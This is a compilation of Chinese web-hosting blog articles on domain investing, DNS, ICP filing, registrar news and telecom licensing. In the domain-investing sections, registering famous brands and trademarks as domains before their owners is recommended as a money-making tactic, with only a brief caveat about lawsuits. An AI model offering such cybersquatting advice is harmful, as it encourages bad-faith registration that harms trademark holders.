其次是域名含有一定的意义,好的域名往往紧扣社会的焦点。俗话说什么热就炒什么。域名的意义一眼就能让人看出来才行,往往造成理解上的困难。而那些有着明显含义的英文字母,数字组合往往能取到意想不到的效果。据他们互联网络信息中心的调查显示,如这些有含义的词汇,域名价格也不错。 那些从事旅游、电脑服务的公司,往往会喜欢这种让人一眼就能看出服务内容的域名。那些已经使用的域名,其价值要超过新注册的域名。原因在于判断一个域名好与不好,最直观的标准就是该网站每天有多少人登录浏览,人越多商机才更多。已经在使用的域名,浏览人数是确定的,已经有一部分稳定的访问者,这就能减少该网站今后推广的成本。特别是那些在各大搜索网站有着很好排名的域名,更是成为各个公司、个人选择的目标。       傍名牌是很多投资者喜欢采用的方法。抢在国际公司进入中国之前就将品牌抢注成域名,趁国内知名企业尚未意识到域名价值之前先下手为强,这是很多投资者心目中成功的捷 径。北京公司抢注Google成功的例子也许证明此路可通。但是这种投资方式往往会引发争议,闹上法庭也时有发生。想靠傍名牌赚钱需要具备吃官司的心理准备,前期投入也不止注册费那么简单。法院一旦判定是恶意抢注,很可能一无所获。      无论域名评估的价值有多高,最终的目的还是要卖出去。很多人给自己的域名开价动辄几万几十万,这肯定是不现实的。域名一个重要特点是可替代性高。一旦一个公司看上了卖家的域名,如果价格不合适,在前缀后缀上稍加改动就能自己去注册,根本不需要花费巨资从卖家手上买。所以卖家的定价一定要合理,一般公司能承受的价格在几千元左右,最高不能超过一万元。而卖给个人的价格则应该控制在千元左右。花费巨大的人力财力,跟知名公司打一场域名争夺战,最后获得百万回报,这恐怕是大多数人无法承受的。 建议域名投资者不要随意扩大投资的范围,选择一两个简单实用的域名,先把网站建立起来。跟一些网络爱好者合作,先把网站的名声打出去,争取更高的浏览量,这样的域名不愁卖不出去。 3、域名工具 我们有时在寻找域名的过程中,会感觉不是那么好找,想了半天也没有结果。那么下面一些工具,会助你一臂之力,让你更快的发现一个对你来说是具有价值的域名。 Domain Hacks 域名Hack服务,类似于一样,把单词delicious(中文为”美味的”)进行切割,创造出有趣的个性域名。 SaveSpell 很棒的一个域名查询站点,它提供了快速查询,即将到期的域名列表、有效域名列表等非常多的有用信 息。 Domain Hunter 域名猎人,用户只要输入一个关键字,然后设置好相关的选项,它会自动产生并列出一系列,有价值的与其它关键字混合的域名。 Pool Hotlist 列表中列出了已过期的域名,任何人都可以抢注这些域名,而且每天会更新。有可能打开速度会比较慢。 Dislexicon 为关键字自动添加前后缀,创造出一个新的单词,也许有时候会产生非常酷的域名。 OneLook 通配符查询有意义及有价值的单词及短语,支持*及?两种通配符。 NameBoy 这是一个非常棒的域名查询系统,用户可输入两个以内的单词进行域名查询,它会根据你提供的单词进行自动匹配,产生更多有意义的域名,另外每个自动产生的域名后面还会列出注册情况,包括.com, .net, .org, .info, .biz, .tv这六种国际域名。 WordMixer 词汇混合工具,最多支持5个单词,它会根据音节来自动匹配并产生很多混合词让你选择。比如我用my和video这两个单词,就会自动列出vidideeo、viideeo、eomyeo等很多比较易记且上口的混合词供你选择。 RhymeZone 找一个与关键字相似且比较押韵的单词,或同义字等等,有利于访问者更方便记忆。 Google Keyword Tool 据你的网站主题,查找一些比较流行的关键字,发现有价值的域名。 4、域名要素 域名价值评估三要素:域名的结构、单词的影响力、市场性。 一个好的域名可能蕴含着巨大的商业价值。选择恰当的域名,使域名与企业的名称、商标整合在一起,构成一个完美的CI标志。最好将域名注册得简短、形象,易于记忆使用。 关于后缀 在美国,“.com”的域名被认为是最好的,而相同的“.net”域名的价值只有“.com”域名价值的20%-25%,“.org”则只有10%;中国则是.com为王,.cn居其后,其余大致相同 域名长度 一般地讲,越短的域名越有价值。超过15个字符的域名不太可取。 连字符(-)会削弱域名的易输入性,降低域名的价值。 1、容易被理解的域名,其价值就高。 2、和业务的关联性一眼就能看出提供哪种产品或服务的域名,其价值就高。 3、发音清晰,域名发音不易被混淆,从读音就能正确拼写的域名价值就高。 4、单词的语调也能影响域名的价值。 5、给人印象和容易记忆。 给人印象 域名的印象是指一个域名给人留下的第一印象,当人们看了第一眼后能够记住的程度。把你的域名告诉你的朋友,一天后再问他们是否还记得该域名?给人留下深刻而良好的印象的域名价值就高。 二、域名投资技巧介绍 由于域名都具有唯一稀缺通用和便捷的特性,增加潜在客户的览,具有较高的商业价值,在互联网时代已经成为一个群体的生财道,并由此催生域名投资热,任何行业都存在投资和投机的问题,域名产业也不外,易名网负责人孔德菁指出域名投资是一个朝阳产业有良好的发展前景理性正规的域名投资可给投资者带来丰厚回报。 域名投资—投资技巧 面对如此多的域名,新手怎样才能注册到好的域名呢?业内大虾的四大技巧可助你投资赚钱。 技巧一:域名要短。 越短的域名组合越少,就越稀缺。比如单数字.com总共才10个,二数字.com才100个。。。以此类推。 技巧二:后缀要好。 后缀是评估一个域名最重要的标准,市场上一般追捧.com和.cn的域名,至于其他后缀则少有人问津。如:wan.com和wan.org.cn,前面一个可以卖百万元以上,后面一个才几百元。若将域名进行等级排定,一般是.com;.cn;.com.cn;.net;.org;.net.cn;.org.cn。 技巧三:创意要佳。 创意域名就是指mydesign.com.cn,boysex.cn,这样用2个英语单词合在一起的域名,意思可按字面的意思来解释。另外,由于我国的数字也是单音节的,也可音译。这类创意域名是很多新入行的“米农”第一选择,但也正因为没经验,这些域名往往是他们的第一笔“学费”,因此,如何创意最重要的就是要用大家常用的单词,如my,ok,123,china.cn等。 技巧四:选好出售渠道。 一般而言,域名出售的渠道有这样几条,在专业网站上卖,比如4.cn;通过QQ群转卖;通过淘宝这样的拍卖网站卖;再就是企业自己找上门来买。但最好应该走出去,帮助企业建站,这才是域名投资的正途。 域名投资—投资选择 一、量体裁衣,够用即可 在选择域名投资提供商之前,必须得为自己做的网站有一个全面的认识。首先应该从内容和定位来考虑未来的访问量,如果是个人的 或者是公司的,访问量应该预计在一定的范围内,然后从访问量来选择需要的带宽和服务商提供的主机配置,太高了就会造成浪费。其次, 是空间和服务的选择,最后要考虑的是服务商,在上面的基础上,从收费和域名上选择,对于是否注册域名还是选择子域名。 二,货比三家,不怕麻烦 在确定了自己的需要之后,寻找服务商,首先要保证的连接速度和稳定,在比较完域名投资服务商上的价格后,最好去他们的一些客户的网站上看看,通过他们的客户的连接速度来观察他们服务质量。 三,微小细节,不可错过 最后确定你的域名投资服务商,这时候 就到了交钱交货的阶段了,这时候,一定要注意一些细节问题,譬如 仔细研究你收到的服务条款,自己书写好你的注册信息,确保你的信息是准确正确的。在付款之后一定要保存单据,在收到密码要尽量更 改好密码。这些细节小事应该注意到,以免以后出现麻烦。 四,选择信誉好、有品牌保证的服务商。 不要为了便宜几块钱选择一个在行业里面一点知名度也没有的域名投资服务商。 域名投资—投资绝招 对于初入行的“米农”来说,四种常规招数是迅速上手的捷径。 招数一:通用名词、行业名称、商品概念等通用词汇抢先注。 如car.cn、leather.cn、3G.cn、flower.cn等,此外,在中国,通用词汇的全拼也有利于国人的接受和记忆,如qiche.cn、shouji.cn等。同时,约定俗成的字母简写和数字域名也是好域名的一个来源,如pc.com.cn、315.com.cn等。 招数二:抢注知名品牌、知名商标和产品的域名。 如有企业在几年前抢注了google.cn和google.com.cn这两个域名,最终获得了百万美元的回报。(但是风险也很高,容易引起仲裁风波) 招数三:跟风注册热门词汇。 随着CN域名的流行,CN域名投资很多集中于热门词汇,响应速度相当快。苏丹红事件甫一发生,就有人抢注了sudanhong.cn;麦当劳开通“我就喜欢”网站,就有人抢注wojiuxihuan.cn。 招数四:注册被删除的域名。 在许多域名网站上,可以找到管理机构每天公布的删除名单。这些域名多是以往投资者或企业所注册,由于忘记续费或者手头域名太多而放弃的。投资者只要留心,完全可以从中挖掘出有价值的域名来。如入选第一届最有价值CN域名评选的jeep.cn这个域名,就是抢注者从到期被删除的域名中抢注到的。 域名投资—专家建议 那些已经使用的域名,其价值要超过新注册的域名。原因在于判断一个域名好与不好,最直观的标准就是该网站每天有多少人登录浏览,人越多商机才更多。已经在使用的域名,浏览人数是确定的,已经有一部分稳定的访问者,这就能减少该网站今后推广的成本。特别是那些在各大搜索网站有着很好排名的域名,更是成为各个公司、个人选择的目标。傍名牌是很多投资者喜欢采用的方法。抢在国际公司进入中国之前就将品牌抢注成域名,趁国内知名企业尚未意识到域名价值之前先下手为强,这是很多投资者心目中成功的捷径。 域名投资者不要随意扩大投资的范围,选择一两个简单实用的域名,先把网站建立起来。跟一些网络爱好者合作,先把网站的名声打出去,争取更高的浏览量,这样的域名不愁卖不出去。 域名投资—经典案例 案例一:从0升值到3800万美元的域名cool.com 当Tim Lee在1995年注册cool.com时(注:1995年8月以前可以免费注册域名),他还是 华盛顿大学的一名大四学生,当时遭到了他的朋友的嘲笑。他们不明白Tim为什么需要域名,当时Tim只想挣足够的钱来付清学费贷款和房子,“我差一点把它以低于1万美元卖了;1996,Tim每周平均要接到二个要购买cool.com的电话,但他没有舍得卖掉,在潜在的买主中,包括大陆航空公司。最近,纽约一位律师告诉Tim,他的一个客户(一家著名消费品生产商)愿意出300万美元现金购买cool.com,后来这家公司将价格升到3500万美元,其中800万美元为现金,3000万美金为公司股票。 案例二:从15万美元升值到750万美元的域名Business.com 马克.欧斯特洛夫斯基是美国休士顿的一名商人,1996年他以十五万美元的代价,向英国一家网络服务公司买下business.com 名称,这个价钱在当时被视为天价,别人认为他是个傻子或疯子.而在1999年 12月,马克.欧斯特洛夫斯基以七百五十万美元的天价把Business.com卖给位于美国加州eCompanies, 该公司系由前迪士尼网络部门总经理魏尼邦和Earthlink创办人戴顿合办。欧斯特洛夫斯基自称是个科技冒险家,他靠科技冒险赚了大笔钱,科技冒险必须要动脑筋,并且具备发掘市场的知识。 eCompanies的创办人之一魏尼邦说,这个易记的名字值得此天价,这个名字将为eCompanies节省数以百万计的广告成本,他计划使用这个名字开创新事业,协助其它企业进入电子商务世界。 案例三:从60元人民币升值到2000万美元的域名g.cn。 据网友透露,包括从b.cn到z.cn在内的23个域名均被一位郑姓个人注册。2005年,郑先生将b.cn、g.cn、y.cn等13个单字母的CN域名进行转让,每个转让价为5-10万元人民币,其中“g.cn”落入域名投资大鳄蔡文胜之手。之后的2007年,Google在收购方案中将g.cn和265.com等资产一并收购,据传闻总价为2000万美元。 #### 域名换IP(服务器)对收录影响大么?如何解决影响? 当您更改域名对应的IP地址时,搜索引擎可能会受到一定的影响,具体取决于如何处理这个更改。以下是一些可能影响搜索引擎收录的情况: 更改域名的IP地址后,搜索引擎需要重新抓取和索引您的网站。这可能需要一些时间,并且您可能会在搜索引擎中暂时失去排名和流量。 如果您的网站更改后仍然可用并保留了相同的内容和结构,则影响可能会较小。搜索引擎可能会将新的IP地址视为旧的IP地址的替代品,但这需要一定的时间才能完成。 如果您的网站更改后有更改内容或结构,则您需要确保搜索引擎能够及时发现这些更改,并将其索引到正确的位置。否则,您的排名和流量可能会受到更大的影响。 因此,如果您计划更改您的域名对应的IP地址,建议您在更改前制定一个计划,并遵循以下最佳实践: 在更改前备份网站数据,并确保网站更改后仍然可用。 更改后尽快更新DNS记录,以确保搜索引擎可以快速找到您的新IP地址。 确保您的网站在更改后保持内容和结构的一致性。 更新您的网站地图和其他必要的元数据,以便搜索引擎可以正确地索引您的网站。 监测您的搜索引擎排名和流量,并在需要时采取行动。 #### 域名有备案不建议用海外CDN 容易被国内DNS污染 最近,有位站长联系上主机帮表示其两个域名被污染了,咨询有什么办法恢复。 主机帮通过测试发现这个客户的两个域名ping出的节点都是来自香港的CDN IP。 这是一家来自于一家小服务商的香港CDN,对于国内长城防火墙来说,属于检测范围内了,一但网页出现违规或者同IP下有违规内容,就会有被拦截污染的风险。 通过检测路由我们发现该香港CDN节点最后经过了美国洛杉矶的机房,这种是特别容易被墙的。 所以我们建议客户把CDN换成国内的,这样就不在长城防火墙的检测范围了。 #### 域名注册商 GoDaddy 被指悄悄在托管网站页面植入脚本 有网站管理者发文指责全球知名域名注册商 GoDaddy 在未经其授权的情况下,私自在其所有网页中植入 JavaScript 脚本,而这可能导致网站性能下降甚至崩溃。 该网友的网站托管于 GoDaddy,在检查网站时,他发现了无法识别的 JavaScript 映射文件,这意味着有不明 JavaScript 代码在其网站上加载,而且引发了一系列警报,于是他深入分析原因。 最后,他发现网站上所有页面都在闭合 </html> 之前注入了一段 <script>: <script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'}),_trfd.push({'ap':'cpsh'},{'server':'xxxxxxxx0000'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js'></script> 实际上这是一种名为 Real User Metrics(RUM)的技术,它的 JavaScript 代码片段用于衡量和跟踪用户网站的性能,并收集连接时间和页面加载时间等信息,用于改进系统、优化 DNS 解析、改善网络路由和服务器配置。 GoDaddy 在其帮助文档中表示“绝大部分用户对此不会感觉到有什么问题,但 JavaScript 脚本本身可能会导致网站加载缓慢或破坏网页”,而文章作者表示愤怒的地方就在这里,一方面,GoDaddy 明知道 RUM 会让用户的网站出问题,而另一方面它又没有让用户有足够的选择权,而是选择以“侵犯 Web 主机与用户之间的信任”的方式悄悄使用该技术。 值得一提的是,作者在讲到 GoDaddy 承认 JavaScript 脚本会对网站造成损害的时候,强势嘲讽了一下 GoDaddy 这个所谓用于提高性能和可靠性的 RUM: So much for a tool that is designed to improve performance and reliability! 该 RUM 服务可以禁用,方法:找到主机控制台,单击右上角的“...”,单击“Help Us”。 在弹出的窗口中单击“Opt Out”。 #### 域名注册商 GoDaddy(狗爹) 宣布以 3.2 亿美元收购支付公司 Poynt 12月16日消息:据 ZDNet 报道,知名的域名注册商 GoDaddy 在周二表示,将以3.2 亿美元现金收购支付技术公司 Poynt,以支持其商务服务,在三年内满足业绩和雇佣条件的前提下,Poynt 将获得4500 万美元的额外补偿。 图片来自 Poynt 据了解, Poynt 公司成立于2013 年,总部位于加州帕洛阿尔托市(Palo Alto),主要提供支付处理服务,包括非接触式店内终端以及在线和电话支付受理技术。 GoDaddy 首席执行官 Aman Bhutani 表示,此次收购将加速 GoDaddy 的发展,从而为客户提供一整套商务和支付服务,满足这一关键的客户需求,并专注于一个巨大的可解决的市场机会。目前有超过10 万家商户使用 Poynt 软件,其中蕴藏着160 亿美元的年业务量。 Website and Internet domain names web concept with domains sign and text on colorful computer keys. Bhutani 称:「我们已经建立了领先的电子商务功能,今天,小企业可以在自己的网站上,在主要的市场和最流行的社交网络上轻松销售,现在我们将帮助他们在各地取得成功」。 Poynt 的支付将被整合到 GoDaddy 的网络托管、营销和 Wordpress 服务中。Poynt 的首席执行官 Osama Bedier 将加入 GoDaddy 团队,并向 Bhutani 汇报,担任新成立的商务部门的负责人。 报道称,这笔交易似乎是 GoDaddy 努力完善其电子商务产品以加强与 Shopify 的竞争。 GoDaddy 是从事互联网域名注册及网站托管的上市公司。 截至2016 年1 月,据称 GoDaddy 管理的域名超过6100 万个,成为获得 ICANN 认证的全球最大注册商,服务逾1300 万客户,员工总数超过4000。 #### 域名注册商不见了域名丢失如何找回 域名就像我们家的大门,别人来访,肯定要经过大门,假如你连门口都没有,人家想看你网站,连“门都没有”,那还有谁来访问呢。很多刚建站的朋友一定有过经历,注册了很久的域名突然有一天,域名商网站上不去了,找不着了,连域名管理权限都没有,不知道怎么办。今天主机吧来教大家如何找回自己的域名。 一、假如我们在不知自己域名顶级代理商的情况下,首先我们先查询你这个域名的域名服务器地址。 我们可以通过域名Whois查询,查询域名服务器 登陆Whois.chinaz.com 输入你的域名查询既可看到 二、从中我们可以看到主机吧的域名服务器地址是whois.paycenter.com.cn,那么们可以百度下这个域名是哪家公司的,很容易我们得到域名是新网的 也可以继续查询域名服务器的whois,从查询联系人就可以清楚的知道:北京新网数码信息技术有限公司   三、只要知道新网的,那就好办了,我们直接到新网官网,咨询域名管理权限丢失如何找回。得到的方法有三种,前两种需要原域名管理者确认,这个在域名商跑路的情况下,基本实现不了。所以我们选用第三种:通过所有人的资质发起 方法三:通过所有人的资质发起 管理权变更资料申请: 个人:域名持有人本人手持身份证原件正反面拍照   企业:法人或经办人手持营业执照副本原件拍照   管理权变更申请表、免责书(账号内下载) 注意: 1.手持营业执照和身份证,手指不可遮挡证件信息 2.照片需免冠,建议未化妆,五官清晰可见 3.照片内容真实有效,不得做任何修改 4.支持jpg格式图片,上传大小为50k-1m之间   注:申请表、免责书及申诉证明必须笔迹清晰可见,无涂改,印章完整,必须为原件照片,复印件无效!   资料申请和邮件申请流程基本一致,只是发起由资料发起,发起资料为1个工作日的审核期,最晚两天的审核,所以资料发起和邮件发起的真个流程大概为5天时间,即发起两个,申诉3天,具体时间得具体看该域名的环节进度! 以上就是新网域名的管理权限取回方法,如果你是其它域名商的,比如万网的,也可以找万网咨询通过什么方法取回。只有域名所有者的名字是你的,取回来不是难事。如果你的域名服务商是国外的,那主机吧就没办法了,毕竟语言不通。 #### 域名百度联盟开启反屏蔽的用户接入百度云加速注意事项 相信很多站长在接入百度云加速后,遇到百度联盟广告不显示的情况。事实是因为你的域名在百度联盟开通了反屏蔽联盟,而反屏蔽联盟会自动推送域名至百度云加速帐号上,很多站长接入百度云加速的时候并不是用百度联盟的帐户登陆的,这也就导致了反屏蔽联盟失效了,自然也就不显示广告了。 那么我们要如何解决这个问题呢? 方法很简单,如果你已经在其它帐户接入了,那么请把其它帐户域名删了,用百度联盟帐号登陆重新接入即可。 在百度云加速登陆窗口,点百度推广帐号登陆即可 注意一定要用你的百度联盟的帐号登陆,不能用别的帐号登陆接入,否则将会影响反屏蔽联盟验证。   #### 域名被劫持怎么办?别慌!域名劫持三个步骤就解决了! 很多企业和站长都遇到过网站域名被劫持的现象,网站域名被劫持之后,生成了大量的垃圾页面,从而使网站造成严重的损害,排名没了,权重没了,更严重的甚至网站都被K掉了。面对这种现象,我们一般会各种不淡定,究竟该怎么办呢? 其实,简单的三个步骤就能解决: 首先我们先了解下域名劫持,就是域名被劫持从而盗取你的个人用户资料来修改你的网站的泛解析,在你的域名解析上面增加一些新的IP,产生很多垃圾页面从而导致用户根本访问不到你的真实页面,导致你网站降权,关键词排名一夜之间消失不见,甚至严重到网站被K掉!如何处理域名劫持这一现象呢? 第一步:关闭域名的泛解析,我们必须要有域名的管理帐号和密码,否则只能通过域名服务商来解决了(当然这样可能会比较浪费时间),进入了域名管理后台之后就可以点击我们的域名找到带*号的域名解析,删除掉就可以了。 第二步:举报大量垃圾页面,因为那些垃圾页面都会成为我们网站的死链,所以我们要把这些死链都解决掉。我们在页面举报内容处写上网站被恶意泛解析就可以了。好的情况就是百度会迅速关注你的站点从而帮你大量的删除,不好的情况恐怕只能我们自己把那些垃圾页面一个个的举报掉了。 第三步:看网站整体代码是否有改动。这一步也就是解决了域名劫持问题之后,对自己的网站进行大检查,从而做到彻底的清楚垃圾页面,保证网站的安全性。 当然,很多时候我们的站点受到攻击是不可避免的,既然我们没有能力来阻止其攻击,那么我们可以选择一些比较有实力的空间服务商和域名注册服务商帮我们做好安全的防御,也可以购买百度云加速防护。 #### 域名被微信封了怎么办? 最近主机吧在做一个淘宝客网站,不过新申请的域名中招了,域名之前有被别人用来做过网站,而且被微信封杀过,在微信里打开提示:已停止访问该网页 遇到这种问题只能说中奖了,买域名之前没有查询过之前域名是否被封杀过,想要解决其实也很简单,只要现在做的网页没问题,大可以向微信申请恢复访问,点申请恢复访问 修改提示违规的地址,申请恢复   填写完成答题 输入姓名,身份证,申请理由,网站备案号,完成申诉。 微信审核后,会通过微信公众号平台发消息告诉你审核结果,主机吧的申诉通过了。 以上就是主机吧操作解决域名被微信封了的解决过程,希望可以帮助大家。 #### 域名解析中“TTL”是什么意思? 在域名解析过程中,"TTL"是"Time-To-Live"的缩写,意为"存活时间"。这是指一个DNS记录在被缓存后可以存在的时间长度。当一个DNS查询被发送到DNS服务器时,如果该服务器已经缓存了相关的记录,并且该记录的TTL还没有过期,那么服务器就会直接使用这个已缓存的记录来响应查询,而不必再次向其他服务器查询。 TTL的单位通常是秒。例如,如果一个DNS记录的TTL设置为3600秒,那么这个记录在被缓存后可以存在一个小时。当TTL期满后,DNS服务器将会丢弃这个记录,并可能会删除其缓存。 TTL的设定是一个平衡问题。一方面,增加TTL可以减少DNS查询所需的时间,从而提高网页加载速度。另一方面,如果TTL设置得过高,那么当网站的IP地址发生改变时,用户可能需要等待较长的时间才能看到新的内容。因此,通常会根据实际情况合理地设定TTL值。 #### 域名解析耗时是什么?域名解析耗时影响因素有哪些? 域名解析耗时是什么? 域名解析耗时是指在进行域名解析时所花费的时间,通常以毫秒(ms)为单位。具体来说,它是指从用户发起DNS查询请求到获取到域名对应的IP地址所经历的时间。 域名解析耗时影响因素有哪些? 网络延迟 DNS查询请求需要通过网络传输到DNS服务器,并等待DNS服务器返回结果,网络延迟是影响DNS解析时延的重要因素之一。 DNS服务器性能 DNS服务器的性能和负载情况也会影响DNS解析时延。如果DNS服务器负载过高或者响应速度较慢,将会导致DNS解析时延增加。 域名缓存 DNS解析结果可以被缓存在本地或者中间DNS服务器中,如果查询的域名已经被缓存,将会减少DNS解析时延。 域名解析链路 DNS解析过程中涉及多个环节,包括本地DNS缓存、ISP DNS服务器、根域名服务器、顶级域名服务器和权威域名服务器等,每个环节的性能都会对DNS解析时延产生影响。 其他因素 如果本地缓存中有域名和IP地址的对应关系,就会直接在本机获取结果,无需进行全球递归查询,这样解析用时就大大缩短,但缓存对于解析安全有较大影响。此外,权威域名服务器也是影响域名解析耗时的关键,一般的解析服务器都是单节点单线路,如果域名距离较远,可能就会因为跨域跨网造成较大的延迟,如果域名的访问量大,还会造成线路的拥堵. #### 域名过期了但是备案还是我的,网站被人举报涉黄怎么办? 最近发现一件很有意思的事情,主机吧一位客户因为以前备案的一个域名没有注销,被人举报涉黄,闹到市委网信办去了。 客户很冤因为这域名之前确实注册备案过,但是由于经营不善,域名过期后就没有再管了,哪曾想今天收到市委网信的电话,说是他的网站涉黄,要求处理。 但是客户已经没有这个域名的管理权限了,原因他域名过期后,被非法人员重新注册了,自己已经不是这个域名的管理者了。 跟网信办反馈后,他们要求把之前的备案注销了,否则将面临处罚。因为这个域名的备案一直是没有注销的,很容易被用来做非法用图。 注销备案很简单,在原来空间服务器备案网站上注销或者直接到工信部网站下载注销申请表,按要求处理也行。比如腾讯云备案管理-取消接入 如果不知道在哪注销备案的,可联系原来的空间服务商咨询。或者直接进入工信部网站,找到备案注销申诉表下载https://beian.miit.gov.cn/#/Integrated/notice_list 提交注销备案申请后,等审核即可,期间要具体按照网信办的要求进行处理。 最后,如果网站不做了,记得一定要把备案号注销了,否则被非法人员利用,一样会面临责任。 #### 域名重要吗?为什么京东、小米、360要花3000万买域名? 最近在知呼看到这样的一个问题,域名重要吗? 答案是当然重要! 好的域名有以下好处: 1.方便记忆 好听好记的域名可以非常方便用户记住,比如MI.COM、JD.com、360.com都是非常好记的。 2.提升品牌力 域名是互联网上任何可用的网页服务器提供方便人类理解的地址,是企业线上平台的标识和流量入口,承担着企业对外形象窗口的重要作用。它不仅代表了企业在网络上的独有的标识,也是企业的产品、服务、形象、商誉等的综合体现,是企业品牌价值的延伸 。 如果您想要更好地保护自己的品牌,那么拥有一个与您品牌相关的域名非常重要。这可以帮助您避免其他人使用相似或相同的域名,从而混淆访问者并降低您品牌的价值 。 3.有利于搜索引擎排名 域名的长度、易记性、相关性和品牌名称都是影响搜索引擎排名的因素之一 。 一般来说,较短的域名更容易记住,而且更容易被搜索引擎识别。此外,与您网站内容相关的域名也有助于提高搜索引擎排名。 所以我们就能理解,为什么京东、小米、360要花3000万买域名了吧。 #### 境外注册域名不再支持备案 说起备案,全宇宙也就天朝所有,而且一年审核比一年严,主机吧作为网络服务商,挺头疼备案的,很多客户都是因为备案问题而选择海外空间,但事实上海外空间速度稳定性并不如国内。 值得注意的是今天起境外注册的域名不再支持备案了,那些海外注册的域名小心啦。 自2018年1月1日起,境外注册域名不可备案,国内注册的域名必须实名认证,并满足以下条件才可备案。 个人网站备案域名所有者信息应与网站负责人信息保持一致(姓名、证件类型、证件号码); 企业备案域名所有者应与公司信息保持一致(公司名称、证件类型、证件号码)或与主体负责人信息保持一致(姓名、证件类型、证件号码)。 已备案成功的客户请按要求修改域名注册信息,以免备案号被注销。   所以以后想用海外域名注册商的,如果考虑要备案的话,还是别去海外服务商注册哦。 #### 境外黑客扬言攻击我国视频监控系统 2月12日 消息:据国家互联网应急中心CNCERT消息,近期,境外黑客组织声称将于 2 月中旬对我国发起网络攻击,以我国多家视频监控系统作为攻击目标,并公布了其掌握的一批相关视频监控系统在用境内IP地址。 对此,国家互联网应急中心(简称CNCERT)通报称,经分析,我国视频监控系统存在一定的漏洞安全隐患和数据泄露风险,可能成为境外黑客发起攻击的薄弱环节,建议各单位和相关用户及早排查风险隐患,提前做好防范应对。 #### 增值电信业务经营许可证查询 增值电信业务经营许可是指在中国境内,利用公共网络基础设施提供电信与信息服务的企业,必须依法取得的行政许可。该许可由工业和信息化部(工信部)或其授权的省级通信管理局颁发,未取得许可不得开展相关业务。 ✅ 什么是增值电信业务 根据《电信条例》及《电信业务分类目录》,电信业务分为: 基础电信业务(如固定通信、移动通信、卫星通信等) 增值电信业务(利用基础网络提供附加服务,如互联网信息服务、在线数据处理、短信服务、CDN、IDC、呼叫中心等) ✅ 常见需要增值电信业务许可的业务类型 业务类型对应许可证举例经营性网站/APPICP证(B25类)淘宝、知乎、抖音电商平台(含第三方入驻)EDI证(B21类)京东、拼多多短信/验证码服务SP证(B25类)云片、阿里云短信CDN加速服务CDN证(B12类)阿里云CDN、腾讯云CDN呼叫中心业务呼叫中心证(B24类)客服外包公司 ✅ 申请条件(适用于第二类增值电信业务) 条件要求公司性质依法设立的内资公司(外资需走合资路径,且外资比例受限) 注册资本省内经营:≥100万元;全国经营:≥1000万元 人员有与业务匹配的专业人员(如技术、客服、信息安全)场地与设施有固定办公场所、服务器、技术方案等信誉要求公司及其高管未被列入电信业务经营失信名单其他需提交业务发展计划、技术方案、安全保障措施等材料 ✅ 无需申请许可证的情形 根据工信部和各地通信管理局规定,以下情况无需申请增值电信业务经营许可 : 企业自营销售商品或服务,无第三方入驻; 企业仅通过微信公众号、小程序、支付宝生活号开展业务,无独立平台; 企业仅发布自身信息,不提供信息发布平台服务。 ✅ 审批机关与时限 业务范围审批机关审批时限省内业务省级通信管理局(如广东省通信管理局)约60个工作日跨省/全国业务工信部约60个工作日 ✅ 违法经营的后果 未取得许可擅自经营增值电信业务,可能面临: 责令关闭网站或APP; 没收违法所得; 罚款(最高可达100万元); 列入失信名单 如需办理,建议通过工信部政务服务平台或各省通信管理局官网直接提交申请,不收取中介费用。 #### 墨西哥云服务器来了,阿里云墨西哥数据中心开服 2 月 19 日消息,阿里云今日宣布墨西哥数据中心正式开服,这是阿里云在拉美区域的首个数据中心,将为中国出海企业及当地客户提供产品及服务。 阿里云墨西哥数据中心首批上线的产品涵盖弹性计算、云存储、网络服务和容器技术等核心云计算能力,核心产品价格低于其他主流国际云厂商,以满足拉美市场上各行各业对云服务的迅猛需求。未来,阿里云还将继续在当地市场加大生态和服务体系建设投入。 本月中旬,阿里云还启用了泰国第二座数据中心。阿里云在海外市场增长迅速,市场规模五年增长 20 倍以上。目前,阿里云在全球 28 个地域运营 86 个可用区,在海外服务超数百万客户。 #### 备案问题:营业执照注销,备案受影响吗? 网站域名之前已经备案好了,然后公司营业执照注销了,会影响网站域名备案吗? 对于这个问题,主机吧可以肯定的告诉你:会影响。 工信部每个一段时间就会检查网站主体信息,如果网站营业执照有更变更的,就会要求更新营业执照,如果无法完成更新的,就会注销备案号。 #### 复旦MOSS大模型:接下来会推出算力更大的MOSS模型 6月1日,据上证报报道,复旦大学自然语言处理实验室(简称“MOSS”)系统负责人邱锡鹏表示,自MOSS后台上线以来,已收到数百家企业的使用申请。这些企业中以中小企业为主,涵盖传统行业、智能信息服务、金融、医疗、教育等领域。 邱锡鹏透露,MOSS模型的主要功能是帮助企业以较低成本将大型预训练模型应用于特定领域。未来,复旦计划推出算力更强、推理能力更高的MOSS模型。 MOSS大模型是国内第一个对话式大型语言模型,由复旦大学自然语言处理实验室于2023年2月20日发布。 MOSS基于公开的中英文数据训练,目前已经拥有200亿参数,具有和人类对话的能力,并可以通过与人类交互实现迭代优化。 复旦MOSS网址:moss.fastnlp.top/#/ #### 外资企业可以在国内运营 IDC、CDN、公有云业务啦,目前13家获增值电信业务试点 政策背景2024年10月,中国工业和信息化部正式启动“增值电信业务扩大对外开放”试点工作,在北京、上海、海南、深圳四地取消互联网数据中心(IDC)、内容分发网络(CDN)、互联网接入服务(ISP)等业务的外资股比限制。此举旨在深化电信领域开放,推动国内外资本公平竞争。截至2025年2月底,我国外商投资电信企业已超2400家,同比增长30%。 首批13家试点企业名单及背景 本次获批的外资企业涵盖科技、金融、医疗、航空等领域,多为全球行业巨头子公司,具体包括: 北京阿帕科蓝科技集团有限公司 德电(中国)通信技术有限公司 母公司:德国电信(Deutsche Telekom,总部德国) 电讯盈科科技(北京)有限公司 母公司:电讯盈科(PCCW,总部中国香港) 海南邓白氏数据科技有限公司 母公司:邓白氏公司(Dun & Bradstreet,总部美国) 汇丰金融科技服务(上海) 母公司:汇丰银行(HSBC,总部英国) 空中客车(中国)企业管理服务有限公司 母公司:空中客车(Airbus,总部法国) 上海同道猎聘科技有限公司(猎聘) 深圳市伊登软件有限公司 深圳市优克联新技术有限公司(uCloudlink) 西门子数字科技(深圳)/数字医疗科技(上海) 母公司:西门子集团(Siemens,总部德国) 一诺(海南)离岸数据投资管理有限公司 中银金融科技有限公司 母公司:中国银行 政策核心内容与意义 1. 试点政策亮点 开放领域:允许外资全资控股IDC、CDN、ISP、在线数据处理等增值电信业务。 